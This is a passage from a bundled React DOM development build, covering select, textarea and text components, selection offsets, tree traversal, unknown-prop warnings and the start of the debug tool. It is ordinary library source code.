props);\n    }\n\n    var value = LinkedValueUtils.getValue(props);\n    inst._wrapperState = {\n      pendingUpdate: false,\n      initialValue: value != null ? value : props.defaultValue,\n      listeners: null,\n      onChange: _handleChange.bind(inst),\n      wasMultiple: Boolean(props.multiple)\n    };\n\n    if (props.value !== undefined && props.defaultValue !== undefined && !didWarnValueDefaultValue) {\n      \"development\" !== 'production' ? warning(false, 'Select elements must be either controlled or uncontrolled ' + '(specify either the value prop, or the defaultValue prop, but not ' + 'both). Decide between using a controlled or uncontrolled select ' + 'element and remove one of these props. More info: ' + 'https://fb.me/react-controlled-components') : void 0;\n      didWarnValueDefaultValue = true;\n    }\n  },\n\n  getSelectValueContext: function (inst) {\n    // ReactDOMOption looks at this initial value so the initial generated\n    // markup has correct `selected` attributes\n    return inst._wrapperState.initialValue;\n  },\n\n  postUpdateWrapper: function (inst) {\n    var props = inst._currentElement.props;\n\n    // After the initial mount, we control selected-ness manually so don't pass\n    // this value down\n    inst._wrapperState.initialValue = undefined;\n\n    var wasMultiple = inst._wrapperState.wasMultiple;\n    inst._wrapperState.wasMultiple = Boolean(props.multiple);\n\n    var value = LinkedValueUtils.getValue(props);\n    if (value != null) {\n      inst._wrapperState.pendingUpdate = false;\n      updateOptions(inst, Boolean(props.multiple), value);\n    } else if (wasMultiple !== Boolean(props.multiple)) {\n      // For simplicity, reapply `defaultValue` if `multiple` is toggled.\n      if (props.defaultValue != null) {\n        updateOptions(inst, Boolean(props.multiple), props.defaultValue);\n      } else {\n        // Revert the select back to its default unselected state.\n        updateOptions(inst, Boolean(props.multiple), props.multiple ? [] : '');\n      }\n    }\n  }\n};\n\nfunction _handleChange(event) {\n  var props = this._currentElement.props;\n  var returnValue = LinkedValueUtils.executeOnChange(props, event);\n\n  if (this._rootNodeID) {\n    this._wrapperState.pendingUpdate = true;\n  }\n  ReactUpdates.asap(updateOptionsIfPendingUpdateAndMounted, this);\n  return returnValue;\n}\n\nmodule.exports = ReactDOMSelect;\n},{\"159\":159,\"160\":160,\"24\":24,\"34\":34,\"82\":82}],44:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar ExecutionEnvironment = _dereq_(138);\n\nvar getNodeForCharacterOffset = _dereq_(117);\nvar getTextContentAccessor = _dereq_(118);\n\n/**\n * While `isCollapsed` is available on the Selection object and `collapsed`\n * is available on the Range object, IE11 sometimes gets them wrong.\n * If the anchor/focus nodes and offsets are the same, the range is collapsed.\n */\nfunction isCollapsed(anchorNode, anchorOffset, focusNode, focusOffset) {\n  return anchorNode === focusNode && anchorOffset === focusOffset;\n}\n\n/**\n * Get the appropriate anchor and focus node/offset pairs for IE.\n *\n * The catch here is that IE's selection API doesn't provide information\n * about whether the selection is forward or backward, so we have to\n * behave as though it's always forward.\n *\n * IE text differs from modern selection in that it behaves as though\n * block elements end with a new line. This means character offsets will\n * differ between the two APIs.\n *\n * @param {DOMElement} node\n * @return {object}\n */\nfunction getIEOffsets(node) {\n  var selection = document.selection;\n  var selectedRange = selection.createRange();\n  var selectedLength = selectedRange.text.length;\n\n  // Duplicate selection so we can move range without breaking user selection.\n  var fromStart = selectedRange.duplicate();\n  fromStart.moveToElementText(node);\n  fromStart.setEndPoint('EndToStart', selectedRange);\n\n  var startOffset = fromStart.text.length;\n  var endOffset = startOffset + selectedLength;\n\n  return {\n    start: startOffset,\n    end: endOffset\n  };\n}\n\n/**\n * @param {DOMElement} node\n * @return {?object}\n */\nfunction getModernOffsets(node) {\n  var selection = window.getSelection && window.getSelection();\n\n  if (!selection || selection.rangeCount === 0) {\n    return null;\n  }\n\n  var anchorNode = selection.anchorNode;\n  var anchorOffset = selection.anchorOffset;\n  var focusNode = selection.focusNode;\n  var focusOffset = selection.focusOffset;\n\n  var currentRange = selection.getRangeAt(0);\n\n  // In Firefox, range.startContainer and range.endContainer can be \"anonymous\n  // divs\", e.g. the up/down buttons on an <input type=\"number\">. Anonymous\n  // divs do not seem to expose properties, triggering a \"Permission denied\n  // error\" if any of its properties are accessed. The only seemingly possible\n  // way to avoid erroring is to access a property that typically works for\n  // non-anonymous divs and catch any error that may otherwise arise. See\n  // https://bugzilla.mozilla.org/show_bug.cgi?id=208427\n  try {\n    /* eslint-disable no-unused-expressions */\n    currentRange.startContainer.nodeType;\n    currentRange.endContainer.nodeType;\n    /* eslint-enable no-unused-expressions */\n  } catch (e) {\n    return null;\n  }\n\n  // If the node and offset values are the same, the selection is collapsed.\n  // `Selection.isCollapsed` is available natively, but IE sometimes gets\n  // this value wrong.\n  var isSelectionCollapsed = isCollapsed(selection.anchorNode, selection.anchorOffset, selection.focusNode, selection.focusOffset);\n\n  var rangeLength = isSelectionCollapsed ? 0 : currentRange.toString().length;\n\n  var tempRange = currentRange.cloneRange();\n  tempRange.selectNodeContents(node);\n  tempRange.setEnd(currentRange.startContainer, currentRange.startOffset);\n\n  var isTempRangeCollapsed = isCollapsed(tempRange.startContainer, tempRange.startOffset, tempRange.endContainer, tempRange.endOffset);\n\n  var start = isTempRangeCollapsed ? 0 : tempRange.toString().length;\n  var end = start + rangeLength;\n\n  // Detect whether the selection is backward.\n  var detectionRange = document.createRange();\n  detectionRange.setStart(anchorNode, anchorOffset);\n  detectionRange.setEnd(focusNode, focusOffset);\n  var isBackward = detectionRange.collapsed;\n\n  return {\n    start: isBackward ? end : start,\n    end: isBackward ? start : end\n  };\n}\n\n/**\n * @param {DOMElement|DOMTextNode} node\n * @param {object} offsets\n */\nfunction setIEOffsets(node, offsets) {\n  var range = document.selection.createRange().duplicate();\n  var start, end;\n\n  if (offsets.end === undefined) {\n    start = offsets.start;\n    end = start;\n  } else if (offsets.start > offsets.end) {\n    start = offsets.end;\n    end = offsets.start;\n  } else {\n    start = offsets.start;\n    end = offsets.end;\n  }\n\n  range.moveToElementText(node);\n  range.moveStart('character', start);\n  range.setEndPoint('EndToStart', range);\n  range.moveEnd('character', end - start);\n  range.select();\n}\n\n/**\n * In modern non-IE browsers, we can support both forward and backward\n * selections.\n *\n * Note: IE10+ supports the Selection object, but it does not support\n * the `extend` method, which means that even in modern IE, it's not possible\n * to programmatically create a backward selection. Thus, for all IE\n * versions, we use the old IE API to create our selections.\n *\n * @param {DOMElement|DOMTextNode} node\n * @param {object} offsets\n */\nfunction setModernOffsets(node, offsets) {\n  if (!window.getSelection) {\n    return;\n  }\n\n  var selection = window.getSelection();\n  var length = node[getTextContentAccessor()].length;\n  var start = Math.min(offsets.start, length);\n  var end = offsets.end === undefined ? start : Math.min(offsets.end, length);\n\n  // IE 11 uses modern selection, but doesn't support the extend method.\n  // Flip backward selections, so we can set with a single range.\n  if (!selection.extend && start > end) {\n    var temp = end;\n    end = start;\n    start = temp;\n  }\n\n  var startMarker = getNodeForCharacterOffset(node, start);\n  var endMarker = getNodeForCharacterOffset(node, end);\n\n  if (startMarker && endMarker) {\n    var range = document.createRange();\n    range.setStart(startMarker.node, startMarker.offset);\n    selection.removeAllRanges();\n\n    if (start > end) {\n      selection.addRange(range);\n      selection.extend(endMarker.node, endMarker.offset);\n    } else {\n      range.setEnd(endMarker.node, endMarker.offset);\n      selection.addRange(range);\n    }\n  }\n}\n\nvar useIEOffsets = ExecutionEnvironment.canUseDOM && 'selection' in document && !('getSelection' in window);\n\nvar ReactDOMSelection = {\n  /**\n   * @param {DOMElement} node\n   */\n  getOffsets: useIEOffsets ? getIEOffsets : getModernOffsets,\n\n  /**\n   * @param {DOMElement|DOMTextNode} node\n   * @param {object} offsets\n   */\n  setOffsets: useIEOffsets ? setIEOffsets : setModernOffsets\n};\n\nmodule.exports = ReactDOMSelection;\n},{\"117\":117,\"118\":118,\"138\":138}],45:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126),\n    _assign = _dereq_(160);\n\nvar DOMChildrenOperations = _dereq_(8);\nvar DOMLazyTree = _dereq_(9);\nvar ReactDOMComponentTree = _dereq_(34);\n\nvar escapeTextContentForBrowser = _dereq_(107);\nvar invariant = _dereq_(152);\nvar validateDOMNesting = _dereq_(132);\n\n/**\n * Text nodes violate a couple assumptions that React makes about components:\n *\n *  - When mounting text into the DOM, adjacent text nodes are merged.\n *  - Text nodes cannot be assigned a React root ID.\n *\n * This component is used to wrap strings between comment nodes so that they\n * can undergo the same reconciliation that is applied to elements.\n *\n * TODO: Investigate representing React components in the DOM with text nodes.\n *\n * @class ReactDOMTextComponent\n * @extends ReactComponent\n * @internal\n */\nvar ReactDOMTextComponent = function (text) {\n  // TODO: This is really a ReactText (ReactNode), not a ReactElement\n  this._currentElement = text;\n  this._stringText = '' + text;\n  // ReactDOMComponentTree uses these:\n  this._hostNode = null;\n  this._hostParent = null;\n\n  // Properties\n  this._domID = 0;\n  this._mountIndex = 0;\n  this._closingComment = null;\n  this._commentNodes = null;\n};\n\n_assign(ReactDOMTextComponent.prototype, {\n  /**\n   * Creates the markup for this text node. This node is not intended to have\n   * any features besides containing text content.\n   *\n   * @param {ReactReconcileTransaction|ReactServerRenderingTransaction} transaction\n   * @return {string} Markup for this text node.\n   * @internal\n   */\n  mountComponent: function (transaction, hostParent, hostContainerInfo, context) {\n    if (\"development\" !== 'production') {\n      var parentInfo;\n      if (hostParent != null) {\n        parentInfo = hostParent._ancestorInfo;\n      } else if (hostContainerInfo != null) {\n        parentInfo = hostContainerInfo._ancestorInfo;\n      }\n      if (parentInfo) {\n        // parentInfo should always be present except for the top-level\n        // component when server rendering\n        validateDOMNesting(null, this._stringText, this, parentInfo);\n      }\n    }\n\n    var domID = hostContainerInfo._idCounter++;\n    var openingValue = ' react-text: ' + domID + ' ';\n    var closingValue = ' /react-text ';\n    this._domID = domID;\n    this._hostParent = hostParent;\n    if (transaction.useCreateElement) {\n      var ownerDocument = hostContainerInfo._ownerDocument;\n      var openingComment = ownerDocument.createComment(openingValue);\n      var closingComment = ownerDocument.createComment(closingValue);\n      var lazyTree = DOMLazyTree(ownerDocument.createDocumentFragment());\n      DOMLazyTree.queueChild(lazyTree, DOMLazyTree(openingComment));\n      if (this._stringText) {\n        DOMLazyTree.queueChild(lazyTree, DOMLazyTree(ownerDocument.createTextNode(this._stringText)));\n      }\n      DOMLazyTree.queueChild(lazyTree, DOMLazyTree(closingComment));\n      ReactDOMComponentTree.precacheNode(this, openingComment);\n      this._closingComment = closingComment;\n      return lazyTree;\n    } else {\n      var escapedText = escapeTextContentForBrowser(this._stringText);\n\n      if (transaction.renderToStaticMarkup) {\n        // Normally we'd wrap this between comment nodes for the reasons stated\n        // above, but since this is a situation where React won't take over\n        // (static pages), we can simply return the text as it is.\n        return escapedText;\n      }\n\n      return '<!--' + openingValue + '-->' + escapedText + '<!--' + closingValue + '-->';\n    }\n  },\n\n  /**\n   * Updates this component by updating the text content.\n   *\n   * @param {ReactText} nextText The next text content\n   * @param {ReactReconcileTransaction} transaction\n   * @internal\n   */\n  receiveComponent: function (nextText, transaction) {\n    if (nextText !== this._currentElement) {\n      this._currentElement = nextText;\n      var nextStringText = '' + nextText;\n      if (nextStringText !== this._stringText) {\n        // TODO: Save this as pending props and use performUpdateIfNecessary\n        // and/or updateComponent to do the actual update for consistency with\n        // other component types?\n        this._stringText = nextStringText;\n        var commentNodes = this.getHostNode();\n        DOMChildrenOperations.replaceDelimitedText(commentNodes[0], commentNodes[1], nextStringText);\n      }\n    }\n  },\n\n  getHostNode: function () {\n    var hostNode = this._commentNodes;\n    if (hostNode) {\n      return hostNode;\n    }\n    if (!this._closingComment) {\n      var openingComment = ReactDOMComponentTree.getNodeFromInstance(this);\n      var node = openingComment.nextSibling;\n      while (true) {\n        !(node != null) ? \"development\" !== 'production' ? invariant(false, 'Missing closing comment for text component %s', this._domID) : _prodInvariant('67', this._domID) : void 0;\n        if (node.nodeType === 8 && node.nodeValue === ' /react-text ') {\n          this._closingComment = node;\n          break;\n        }\n        node = node.nextSibling;\n      }\n    }\n    hostNode = [this._hostNode, this._closingComment];\n    this._commentNodes = hostNode;\n    return hostNode;\n  },\n\n  unmountComponent: function () {\n    this._closingComment = null;\n    this._commentNodes = null;\n    ReactDOMComponentTree.uncacheNode(this);\n  }\n});\n\nmodule.exports = ReactDOMTextComponent;\n},{\"107\":107,\"126\":126,\"132\":132,\"152\":152,\"160\":160,\"34\":34,\"8\":8,\"9\":9}],46:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126),\n    _assign = _dereq_(160);\n\nvar LinkedValueUtils = _dereq_(24);\nvar ReactDOMComponentTree = _dereq_(34);\nvar ReactUpdates = _dereq_(82);\n\nvar invariant = _dereq_(152);\nvar warning = _dereq_(159);\n\nvar didWarnValueLink = false;\nvar didWarnValDefaultVal = false;\n\nfunction forceUpdateIfMounted() {\n  if (this._rootNodeID) {\n    // DOM component is still mounted; update\n    ReactDOMTextarea.updateWrapper(this);\n  }\n}\n\n/**\n * Implements a <textarea> host component that allows setting `value`, and\n * `defaultValue`. This differs from the traditional DOM API because value is\n * usually set as PCDATA children.\n *\n * If `value` is not supplied (or null/undefined), user actions that affect the\n * value will trigger updates to the element.\n *\n * If `value` is supplied (and not null/undefined), the rendered element will\n * not trigger updates to the element. Instead, the `value` prop must change in\n * order for the rendered element to be updated.\n *\n * The rendered element will be initialized with an empty value, the prop\n * `defaultValue` if specified, or the children content (deprecated).\n */\nvar ReactDOMTextarea = {\n  getHostProps: function (inst, props) {\n    !(props.dangerouslySetInnerHTML == null) ? \"development\" !== 'production' ? invariant(false, '`dangerouslySetInnerHTML` does not make sense on <textarea>.') : _prodInvariant('91') : void 0;\n\n    // Always set children to the same thing. In IE9, the selection range will\n    // get reset if `textContent` is mutated.  We could add a check in setTextContent\n    // to only set the value if/when the value differs from the node value (which would\n    // completely solve this IE9 bug), but Sebastian+Ben seemed to like this solution.\n    // The value can be a boolean or object so that's why it's forced to be a string.\n    var hostProps = _assign({}, props, {\n      value: undefined,\n      defaultValue: undefined,\n      children: '' + inst._wrapperState.initialValue,\n      onChange: inst._wrapperState.onChange\n    });\n\n    return hostProps;\n  },\n\n  mountWrapper: function (inst, props) {\n    if (\"development\" !== 'production') {\n      LinkedValueUtils.checkPropTypes('textarea', props, inst._currentElement._owner);\n      if (props.valueLink !== undefined && !didWarnValueLink) {\n        \"development\" !== 'production' ? warning(false, '`valueLink` prop on `textarea` is deprecated; set `value` and `onChange` instead.') : void 0;\n        didWarnValueLink = true;\n      }\n      if (props.value !== undefined && props.defaultValue !== undefined && !didWarnValDefaultVal) {\n        \"development\" !== 'production' ? warning(false, 'Textarea elements must be either controlled or uncontrolled ' + '(specify either the value prop, or the defaultValue prop, but not ' + 'both). Decide between using a controlled or uncontrolled textarea ' + 'and remove one of these props. More info: ' + 'https://fb.me/react-controlled-components') : void 0;\n        didWarnValDefaultVal = true;\n      }\n    }\n\n    var value = LinkedValueUtils.getValue(props);\n    var initialValue = value;\n\n    // Only bother fetching default value if we're going to use it\n    if (value == null) {\n      var defaultValue = props.defaultValue;\n      // TODO (yungsters): Remove support for children content in <textarea>.\n      var children = props.children;\n      if (children != null) {\n        if (\"development\" !== 'production') {\n          \"development\" !== 'production' ? warning(false, 'Use the `defaultValue` or `value` props instead of setting ' + 'children on <textarea>.') : void 0;\n        }\n        !(defaultValue == null) ? \"development\" !== 'production' ? invariant(false, 'If you supply `defaultValue` on a <textarea>, do not pass children.') : _prodInvariant('92') : void 0;\n        if (Array.isArray(children)) {\n          !(children.length <= 1) ? \"development\" !== 'production' ? invariant(false, '<textarea> can only have at most one child.') : _prodInvariant('93') : void 0;\n          children = children[0];\n        }\n\n        defaultValue = '' + children;\n      }\n      if (defaultValue == null) {\n        defaultValue = '';\n      }\n      initialValue = defaultValue;\n    }\n\n    inst._wrapperState = {\n      initialValue: '' + initialValue,\n      listeners: null,\n      onChange: _handleChange.bind(inst)\n    };\n  },\n\n  updateWrapper: function (inst) {\n    var props = inst._currentElement.props;\n\n    var node = ReactDOMComponentTree.getNodeFromInstance(inst);\n    var value = LinkedValueUtils.getValue(props);\n    if (value != null) {\n      // Cast `value` to a string to ensure the value is set correctly. While\n      // browsers typically do this as necessary, jsdom doesn't.\n      var newValue = '' + value;\n\n      // To avoid side effects (such as losing text selection), only set value if changed\n      if (newValue !== node.value) {\n        node.value = newValue;\n      }\n      if (props.defaultValue == null) {\n        node.defaultValue = newValue;\n      }\n    }\n    if (props.defaultValue != null) {\n      node.defaultValue = props.defaultValue;\n    }\n  },\n\n  postMountWrapper: function (inst) {\n    // This is in postMount because we need access to the DOM node, which is not\n    // available until after the component has mounted.\n    var node = ReactDOMComponentTree.getNodeFromInstance(inst);\n    var textContent = node.textContent;\n\n    // Only set node.value if textContent is equal to the expected\n    // initial value. In IE10/IE11 there is a bug where the placeholder attribute\n    // will populate textContent as well.\n    // https://developer.microsoft.com/microsoft-edge/platform/issues/101525/\n    if (textContent === inst._wrapperState.initialValue) {\n      node.value = textContent;\n    }\n  }\n};\n\nfunction _handleChange(event) {\n  var props = this._currentElement.props;\n  var returnValue = LinkedValueUtils.executeOnChange(props, event);\n  ReactUpdates.asap(forceUpdateIfMounted, this);\n  return returnValue;\n}\n\nmodule.exports = ReactDOMTextarea;\n},{\"126\":126,\"152\":152,\"159\":159,\"160\":160,\"24\":24,\"34\":34,\"82\":82}],47:[function(_dereq_,module,exports){\n/**\n * Copyright 2015-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126);\n\nvar invariant = _dereq_(152);\n\n/**\n * Return the lowest common ancestor of A and B, or null if they are in\n * different trees.\n */\nfunction getLowestCommonAncestor(instA, instB) {\n  !('_hostNode' in instA) ? \"development\" !== 'production' ? invariant(false, 'getNodeFromInstance: Invalid argument.') : _prodInvariant('33') : void 0;\n  !('_hostNode' in instB) ? \"development\" !== 'production' ? invariant(false, 'getNodeFromInstance: Invalid argument.') : _prodInvariant('33') : void 0;\n\n  var depthA = 0;\n  for (var tempA = instA; tempA; tempA = tempA._hostParent) {\n    depthA++;\n  }\n  var depthB = 0;\n  for (var tempB = instB; tempB; tempB = tempB._hostParent) {\n    depthB++;\n  }\n\n  // If A is deeper, crawl up.\n  while (depthA - depthB > 0) {\n    instA = instA._hostParent;\n    depthA--;\n  }\n\n  // If B is deeper, crawl up.\n  while (depthB - depthA > 0) {\n    instB = instB._hostParent;\n    depthB--;\n  }\n\n  // Walk in lockstep until we find a match.\n  var depth = depthA;\n  while (depth--) {\n    if (instA === instB) {\n      return instA;\n    }\n    instA = instA._hostParent;\n    instB = instB._hostParent;\n  }\n  return null;\n}\n\n/**\n * Return if A is an ancestor of B.\n */\nfunction isAncestor(instA, instB) {\n  !('_hostNode' in instA) ? \"development\" !== 'production' ? invariant(false, 'isAncestor: Invalid argument.') : _prodInvariant('35') : void 0;\n  !('_hostNode' in instB) ? \"development\" !== 'production' ? invariant(false, 'isAncestor: Invalid argument.') : _prodInvariant('35') : void 0;\n\n  while (instB) {\n    if (instB === instA) {\n      return true;\n    }\n    instB = instB._hostParent;\n  }\n  return false;\n}\n\n/**\n * Return the parent instance of the passed-in instance.\n */\nfunction getParentInstance(inst) {\n  !('_hostNode' in inst) ? \"development\" !== 'production' ? invariant(false, 'getParentInstance: Invalid argument.') : _prodInvariant('36') : void 0;\n\n  return inst._hostParent;\n}\n\n/**\n * Simulates the traversal of a two-phase, capture/bubble event dispatch.\n */\nfunction traverseTwoPhase(inst, fn, arg) {\n  var path = [];\n  while (inst) {\n    path.push(inst);\n    inst = inst._hostParent;\n  }\n  var i;\n  for (i = path.length; i-- > 0;) {\n    fn(path[i], 'captured', arg);\n  }\n  for (i = 0; i < path.length; i++) {\n    fn(path[i], 'bubbled', arg);\n  }\n}\n\n/**\n * Traverses the ID hierarchy and invokes the supplied `cb` on any IDs that\n * should would receive a `mouseEnter` or `mouseLeave` event.\n *\n * Does not invoke the callback on the nearest common ancestor because nothing\n * \"entered\" or \"left\" that element.\n */\nfunction traverseEnterLeave(from, to, fn, argFrom, argTo) {\n  var common = from && to ? getLowestCommonAncestor(from, to) : null;\n  var pathFrom = [];\n  while (from && from !== common) {\n    pathFrom.push(from);\n    from = from._hostParent;\n  }\n  var pathTo = [];\n  while (to && to !== common) {\n    pathTo.push(to);\n    to = to._hostParent;\n  }\n  var i;\n  for (i = 0; i < pathFrom.length; i++) {\n    fn(pathFrom[i], 'bubbled', argFrom);\n  }\n  for (i = pathTo.length; i-- > 0;) {\n    fn(pathTo[i], 'captured', argTo);\n  }\n}\n\nmodule.exports = {\n  isAncestor: isAncestor,\n  getLowestCommonAncestor: getLowestCommonAncestor,\n  getParentInstance: getParentInstance,\n  traverseTwoPhase: traverseTwoPhase,\n  traverseEnterLeave: traverseEnterLeave\n};\n},{\"126\":126,\"152\":152}],48:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar React = _dereq_(135);\nvar ReactDOM = _dereq_(31);\n\nvar ReactDOMUMDEntry = ReactDOM;\n\nif (\"development\" !== 'production') {\n  ReactDOMUMDEntry.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED = {\n    // ReactPerf and ReactTestUtils currently only work with the DOM renderer\n    // so we expose them from here, but only in DEV mode.\n    ReactPerf: _dereq_(71),\n    ReactTestUtils: _dereq_(80)\n  };\n}\n\n// Inject ReactDOM into React for the addons UMD build that depends on ReactDOM (TransitionGroup).\n// We can remove this after we deprecate and remove the addons UMD build.\nif (React.addons) {\n  React.__SECRET_INJECTED_REACT_DOM_DO_NOT_USE_OR_YOU_WILL_BE_FIRED = ReactDOMUMDEntry;\n}\n\nmodule.exports = ReactDOMUMDEntry;\n},{\"135\":135,\"31\":31,\"71\":71,\"80\":80}],49:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar DOMProperty = _dereq_(11);\nvar EventPluginRegistry = _dereq_(18);\nvar ReactComponentTreeHook = _dereq_(133);\n\nvar warning = _dereq_(159);\n\nif (\"development\" !== 'production') {\n  var reactProps = {\n    children: true,\n    dangerouslySetInnerHTML: true,\n    key: true,\n    ref: true,\n\n    autoFocus: true,\n    defaultValue: true,\n    valueLink: true,\n    defaultChecked: true,\n    checkedLink: true,\n    innerHTML: true,\n    suppressContentEditableWarning: true,\n    onFocusIn: true,\n    onFocusOut: true\n  };\n  var warnedProperties = {};\n\n  var validateProperty = function (tagName, name, debugID) {\n    if (DOMProperty.properties.hasOwnProperty(name) || DOMProperty.isCustomAttribute(name)) {\n      return true;\n    }\n    if (reactProps.hasOwnProperty(name) && reactProps[name] || warnedProperties.hasOwnProperty(name) && warnedProperties[name]) {\n      return true;\n    }\n    if (EventPluginRegistry.registrationNameModules.hasOwnProperty(name)) {\n      return true;\n    }\n    warnedProperties[name] = true;\n    var lowerCasedName = name.toLowerCase();\n\n    // data-* attributes should be lowercase; suggest the lowercase version\n    var standardName = DOMProperty.isCustomAttribute(lowerCasedName) ? lowerCasedName : DOMProperty.getPossibleStandardName.hasOwnProperty(lowerCasedName) ? DOMProperty.getPossibleStandardName[lowerCasedName] : null;\n\n    var registrationName = EventPluginRegistry.possibleRegistrationNames.hasOwnProperty(lowerCasedName) ? EventPluginRegistry.possibleRegistrationNames[lowerCasedName] : null;\n\n    if (standardName != null) {\n      \"development\" !== 'production' ? warning(false, 'Unknown DOM property %s. Did you mean %s?%s', name, standardName, ReactComponentTreeHook.getStackAddendumByID(debugID)) : void 0;\n      return true;\n    } else if (registrationName != null) {\n      \"development\" !== 'production' ? warning(false, 'Unknown event handler property %s. Did you mean `%s`?%s', name, registrationName, ReactComponentTreeHook.getStackAddendumByID(debugID)) : void 0;\n      return true;\n    } else {\n      // We were unable to guess which prop the user intended.\n      // It is likely that the user was just blindly spreading/forwarding props\n      // Components should be careful to only render valid props/attributes.\n      // Warning will be invoked in warnUnknownProperties to allow grouping.\n      return false;\n    }\n  };\n}\n\nvar warnUnknownProperties = function (debugID, element) {\n  var unknownProps = [];\n  for (var key in element.props) {\n    var isValid = validateProperty(element.type, key, debugID);\n    if (!isValid) {\n      unknownProps.push(key);\n    }\n  }\n\n  var unknownPropString = unknownProps.map(function (prop) {\n    return '`' + prop + '`';\n  }).join(', ');\n\n  if (unknownProps.length === 1) {\n    \"development\" !== 'production' ? warning(false, 'Unknown prop %s on <%s> tag. Remove this prop from the element. ' + 'For details, see https://fb.me/react-unknown-prop%s', unknownPropString, element.type, ReactComponentTreeHook.getStackAddendumByID(debugID)) : void 0;\n  } else if (unknownProps.length > 1) {\n    \"development\" !== 'production' ? warning(false, 'Unknown props %s on <%s> tag. Remove these props from the element. ' + 'For details, see https://fb.me/react-unknown-prop%s', unknownPropString, element.type, ReactComponentTreeHook.getStackAddendumByID(debugID)) : void 0;\n  }\n};\n\nfunction handleElement(debugID, element) {\n  if (element == null || typeof element.type !== 'string') {\n    return;\n  }\n  if (element.type.indexOf('-') >= 0 || element.props.is) {\n    return;\n  }\n  warnUnknownProperties(debugID, element);\n}\n\nvar ReactDOMUnknownPropertyHook = {\n  onBeforeMountComponent: function (debugID, element) {\n    handleElement(debugID, element);\n  },\n  onBeforeUpdateComponent: function (debugID, element) {\n    handleElement(debugID, element);\n  }\n};\n\nmodule.exports = ReactDOMUnknownPropertyHook;\n},{\"11\":11,\"133\":133,\"159\":159,\"18\":18}],50:[function(_dereq_,module,exports){\n/**\n * Copyright 2016-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar ReactInvalidSetStateWarningHook = _dereq_(65);\nvar ReactHostOperationHistoryHook = _dereq_(60);\nvar ReactComponentTreeHook = _dereq_(133);\nvar ExecutionEnvironment = _dereq_(138);\n\nvar performanceNow = _dereq_(157);\nvar warning = _dereq_(159);\n\nvar hooks = [];\nvar didHookThrowForEvent = {};\n\nfunction callHook(event, fn, context, arg1, arg2, arg3, arg4, arg5) {\n  try {\n    fn.call(context, arg1, arg2, arg3, arg4, arg5);\n  } catch (e) {\n    \"development\" !== 'production' ? warning(didHookThrowForEvent[event], 'Exception thrown by hook while handling %s: %s', event, e + '\\n' + e.stack) : void 0;\n    didHookThrowForEvent[event] = true;\n  }\n}\n\nfunction emitEvent(event, arg1, arg2, arg3, arg4, arg5) {\n  for (var i = 0; i < hooks.length; i++) {\n    var hook = hooks[i];\n    var fn = hook[event];\n    if (fn) {\n      callHook(event, fn, hook, arg1, arg2, arg3, arg4, arg5);\n    }\n  }\n}\n\nvar isProfiling = false;\nvar flushHistory = [];\nvar lifeCycleTimerStack = [];\nvar currentFlushNesting = 0;\nvar currentFlushMeasurements = [];\nvar currentFlushStartTime = 0;\nvar currentTimerDebugID = null;\nvar currentTimerStartTime = 0;\nvar currentTimerNestedFlushDuration = 0;\nvar currentTimerType = null;\n\nvar lifeCycleTimerHasWarned = false;\n\nfunction clearHistory() {\n  ReactComponentTreeHook.purgeUnmountedComponents();\n  ReactHostOperationHistoryHook.clearHistory();\n}\n\nfunction getTreeSnapshot(registeredIDs) {\n  return registeredIDs.reduce(function (tree, id) {\n    var ownerID = ReactComponentTreeHook.getOwnerID(id);\n    var parentID = ReactComponentTreeHook.getParentID(id);\n    tree[id] = {\n      displayName: ReactComponentTreeHook.getDisplayName(id),\n      text: ReactComponentTreeHook.getText(id),\n      updateCount: ReactComponentTreeHook.getUpdateCount(id),\n      childIDs: ReactComponentTreeHook.getChildIDs(id),\n      // Text nodes don't have owners but this is close enough.\n      ownerID: ownerID || parentID && ReactComponentTreeHook.getOwnerID(parentID) || 0,\n      parentID: parentID\n    };\n    return tree;\n  }, {});\n}\n\nfunction resetMeasurements() {\n  var previousStartTime = currentFlushStartTime;\n  var previousMeasurements = currentFlushMeasurements;\n  var previousOperations = ReactHostOperationHistoryHook.getHistory();\n\n  if (currentFlushNesting === 0) {\n    currentFlushStartTime = 0;\n    currentFlushMeasurements = [];\n    clearHistory();\n    return;\n  }\n\n  if (previousMeasurements.length || previousOperations.length) {\n    var registeredIDs = ReactComponentTreeHook.getRegisteredIDs();\n    flushHistory.push({\n      duration: performanceNow() - previousStartTime,\n      measurements: previousMeasurements || [],\n      operations: previousOperations || [],\n      treeSnapshot: getTreeSnapshot(registeredIDs)\n    });\n  }\n\n  clearHistory();\n  currentFlushStartTime = performanceNow();\n  currentFlushMeasurements = [];\n}\n\nfunction checkDebugID(debugID) {\n  var allowRoot = arguments.length > 1 && arguments[1] !== undefined ? 